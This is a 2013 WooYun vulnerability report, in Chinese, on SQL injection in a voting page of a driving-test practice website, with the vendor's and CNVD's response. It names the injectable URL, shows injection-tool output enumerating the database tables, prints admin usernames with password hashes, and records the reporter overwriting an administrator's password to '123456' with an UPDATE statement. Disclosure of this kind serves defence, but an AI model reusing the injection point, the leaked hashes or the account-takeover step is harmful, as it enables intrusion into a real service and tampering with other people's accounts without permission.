当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018731

漏洞标题:驾校一点通网站SQL注射漏洞

相关厂商:驾校一点通

漏洞作者: O.o

提交时间:2013-02-18 14:27

修复时间:2013-04-04 14:28

公开时间:2013-04-04 14:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-18: 细节已通知厂商并且等待厂商处理中
2013-02-22: 厂商已经确认,细节仅向厂商公开
2013-03-04: 细节向核心白帽子及相关领域专家公开
2013-03-14: 细节向普通白帽子公开
2013-03-24: 细节向实习白帽子公开
2013-04-04: 细节向公众公开

简要描述:

据说全国最大的驾考科目一模拟平台啊。今天做题总是不能到95+,烦着顺手了下。然后就乌云了。
感觉13科目一号坑爹:
“在道路上发生交通事故造成人身伤亡时,要立即抢救受伤人员并迅速报警。”这个是对的!
“发生交通事故造成人员受伤时,要保护现场并立即报警。”这个也是对的!
我勒个去去!!!到底救不救!!!!

详细说明:

注入点:
http://news.jxedt.com/myvote.asp?VoteID=11
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[21:48:56] [INFO] fetching current database
current database: 'news_jxedt_com'
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[21:50:28] [INFO] fetching current user
current user: 'news_jxedt_com'
Database: news_jxedt_com
[26 tables]
+------------------------------------+
| dbo.[news_jxedt_com.<%NoDown%>] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.v_review_content |
| news_jxedt_com.NB_AdSense |
| news_jxedt_com.NB_ArticleTemplate |
| news_jxedt_com.NB_Column |
| news_jxedt_com.NB_Content |
| news_jxedt_com.NB_FriendLink |
| news_jxedt_com.NB_Interface |
| news_jxedt_com.NB_Ip |
| news_jxedt_com.NB_JsFile |
| news_jxedt_com.NB_Link |
| news_jxedt_com.NB_Master |
| news_jxedt_com.NB_MyFavorites |
| news_jxedt_com.NB_Placard |
| news_jxedt_com.NB_Review |
| news_jxedt_com.NB_System |
| news_jxedt_com.NB_Template |
| news_jxedt_com.NB_User |
| news_jxedt_com.NB_UserGroup |
| news_jxedt_com.NB_Vote |
| news_jxedt_com.S3_Tmp |
| news_jxedt_com.dtproperties |
| news_jxedt_com.pangolin_test_table |
+------------------------------------+
| news_jxedt_com.pangolin_test_table |
有人跑过了啊~
jxedt-cn
97757399087e166d
hustsony
1dfb69daf3087efe
jxedt-zxy
2c9fd2fb24dd5711
newsadmin
69df9c0c743c2d09
没解出来。
替换!!!
49ba59abbe56e057
123456
UPDATE news_jxedt_com.NB_Master SET Master_Password = '49ba59abbe56e057' WHERE Master_Id = 4
OVER!

漏洞证明:

见:详细说明

修复方案:

就一个投票系统重新做下呗亲,别用老的了嘛~

版权声明:转载请注明来源 O.o@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-02-22 10:20

厂商回复:

CNVD确认并复现所述情况,已在19日由CNVD直接联系网站管理方协调处置。
rank 8

最新状态:

暂无